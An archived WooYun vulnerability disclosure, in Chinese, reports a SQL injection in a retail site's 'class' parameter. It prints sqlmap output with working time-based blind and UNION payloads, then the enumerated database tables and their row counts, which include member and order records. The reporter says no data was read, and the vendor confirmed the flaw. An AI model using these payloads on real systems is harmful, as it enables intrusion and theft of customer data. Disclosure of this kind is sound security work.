乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-16: 细节已通知厂商并且等待厂商处理中 2015-12-17: 厂商已经确认,细节仅向厂商公开 2015-12-27: 细节向核心白帽子及相关领域专家公开 2016-01-06: 细节向普通白帽子公开 2016-01-16: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
注入点:http://**.**.**.**/index.php?class=3
sqlmap identified the following injection point(s) with a total of 2253 HTTP(s) requests:---Parameter: class (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: class=3' AND (SELECT * FROM (SELECT(SLEEP(5)))SMiB) AND 'BzUq'='BzUq Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: class=-8597' UNION ALL SELECT CONCAT(0x71626b7171,0x72434a5047777143456e,0x7171707671),NULL,NULL,NULL,NULL,NULL-- ---back-end DBMS: MySQL 5.0.12
current database: 'goldenco_data'available databases [2]:[*] goldenco_data[*] information_schema
Database: goldenco_data[18 tables]+------------------+| action || group || account || action_fun || class || contact || count_list || keyword || member || order_list || order_list_fax || order_list_store || order_list_tel || order_product || order_search || product || sms_num || zipcode |+------------------+Database: goldenco_data+----------------+---------+| Table | Entries |+----------------+---------+| order_product | 29109 || order_list | 5110 || member | 983 || order_search | 450 || zipcode | 368 || contact | 155 || product | 92 || count_list | 40 || order_list_fax | 11 || class | 9 || keyword | 6 || action_fun | 3 || order_list_tel | 2 || `action` | 1 || account | 1 || sms_num | 1 |+----------------+---------+
订单数量和会员数还挺多的,数据就不读了
危害等级:高
漏洞Rank:17
确认时间:2015-12-17 19:00
感謝通報
暂无